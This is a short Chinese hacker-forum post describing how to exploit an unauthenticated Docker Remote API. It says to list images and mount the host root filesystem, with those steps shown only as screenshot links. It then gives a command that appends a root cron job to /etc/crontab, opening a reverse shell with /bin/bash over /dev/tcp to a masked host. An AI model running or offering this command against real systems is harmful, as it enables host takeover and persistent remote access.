中国白客联盟»论坛 › Magic weapon › 动画教程（Animated Tutorials） › Docker Remote API未授权访问漏洞测试方法

发新帖

查看: 557|回复: 0

Docker Remote API未授权访问漏洞测试方法

1839 主题	2255 帖子	1万积分

Rank: 9 Rank: 9 Rank: 9

积分: 11913

发消息

发表于 2016-5-17 17:07:58 | 显示全部楼层 |阅读模式

列出可用的Image
[/url]
挂载宿主机的根目录到/mnt
[url=http://static.wooyun.org/upload/image/201605/2016051716324531199.png]
通过写crontab文件来反弹shell

echo "* * * * * root /bin/bash -i >& /dev/tcp/*/1024 0>&1" >> /mnt/etc/crontab

复制代码

本帖子中包含更多资源

您需要登录才可以下载或查看，没有帐号？Join BUC

x

过段时间可能会取消签到功能了

回复

使用道具举报

发新帖

|小黑屋|手机版|中国白客联盟-BUC ( 赣ICP备15007148号-6 )

GMT+8, 2024-5-15 19:58

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表